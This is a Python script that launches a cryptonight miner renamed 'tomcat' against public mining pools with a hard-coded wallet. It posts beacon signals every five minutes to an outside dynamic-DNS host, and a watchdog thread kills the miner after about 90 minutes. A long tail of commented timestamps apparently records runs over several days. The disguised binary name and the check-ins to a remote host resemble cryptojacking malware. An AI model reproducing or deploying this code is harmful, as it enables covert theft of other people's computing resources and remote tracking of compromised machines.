import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:04.188541
#2018-02-17 16:52:05.927478
#2018-02-17 18:41:03.334394
#2018-02-17 20:29:05.790534
#2018-02-17 22:15:07.688972
#2018-02-18 00:00:09.343024
#2018-02-18 01:51:05.058660
#2018-02-18 03:39:04.060543
#2018-02-18 05:26:06.173226
#2018-02-18 07:18:05.858431
#2018-02-18 09:06:07.166183
#2018-02-18 10:52:04.030366
#2018-02-18 12:39:01.333235
#2018-02-18 14:24:07.764984
#2018-02-18 16:15:04.580483
#2018-02-18 18:03:05.162992
#2018-02-18 19:49:05.734134
#2018-02-18 21:37:05.786951
#2018-02-18 23:25:06.501438
#2018-02-19 01:12:03.698923
#2018-02-19 02:58:04.633796
#2018-02-19 04:45:03.986790
#2018-02-19 06:29:06.704704
#2018-02-19 08:19:07.088787
#2018-02-19 10:08:06.229190
#2018-02-19 11:57:07.677799
#2018-02-19 13:44:09.043908
#2018-02-19 15:34:06.858392
#2018-02-19 17:21:08.157024
#2018-02-19 19:08:07.776374
#2018-02-19 20:56:01.856560
#2018-02-19 22:43:07.918291
#2018-02-20 00:28:04.678779
#2018-02-20 02:15:05.689921
#2018-02-20 04:06:06.247946
#2018-02-20 05:50:01.386398
#2018-02-20 07:36:06.897542
#2018-02-20 09:21:01.737519
#2018-02-20 11:05:01.852282
#2018-02-20 12:51:08.245674
#2018-02-20 14:36:06.862301
#2018-02-20 16:20:13.148274
#2018-02-20 18:08:08.370597
#2018-02-20 19:59:01.311039
#2018-02-20 21:47:07.902602
#2018-02-20 23:28:04.859960
#2018-02-21 02:13:08.673819
#2018-02-21 05:00:09.873186
#2018-02-21 07:58:05.220786
#2018-02-21 11:01:09.343465
#2018-02-21 12:47:07.115874
#2018-02-21 14:35:08.884435
#2018-02-21 16:23:08.526021
#2018-02-21 18:15:12.636622
#2018-02-21 20:02:02.188610
#2018-02-21 21:48:07.590461
#2018-02-21 23:38:03.758596
#2018-02-22 01:27:02.156230
#2018-02-22 03:15:08.042763
#2018-02-22 05:03:07.526517
#2018-02-22 06:46:04.197515
#2018-02-22 08:33:06.825538
#2018-02-22 10:20:05.196597
#2018-02-22 12:07:12.808856
#2018-02-22 13:52:01.467247
#2018-02-22 15:41:01.968803
#2018-02-22 17:28:01.290060
#2018-02-22 19:15:12.456508
#2018-02-22 21:06:04.475907
#2018-02-22 22:50:05.914300
#2018-02-23 00:37:04.034590
#2018-02-23 02:25:06.571331
#2018-02-23 04:15:08.209421
#2018-02-23 06:02:07.085817
#2018-02-23 07:49:06.411151
#2018-02-23 09:53:01.818041
#2018-02-23 11:56:04.352825
#2018-02-23 13:46:07.864445
#2018-02-23 15:34:05.014814
#2018-02-23 17:22:07.258991
#2018-02-23 19:08:10.576582
#2018-02-23 20:53:08.441379
#2018-02-23 22:40:03.115355
#2018-02-24 00:28:01.979335
#2018-02-24 02:19:04.207613
#2018-02-24 04:09:06.675455
#2018-02-24 05:57:05.129560
#2018-02-24 07:46:04.332455
#2018-02-24 09:30:04.861606
#2018-02-24 11:23:05.655181
#2018-02-24 13:13:01.237383
#2018-02-24 15:03:06.913062
#2018-02-24 16:53:01.492092
#2018-02-24 18:41:07.882947
#2018-02-24 20:32:07.008148
#2018-02-24 22:32:06.686007
#2018-02-25 01:41:04.234294
#2018-02-25 05:04:06.097015
#2018-02-25 10:08:02.055093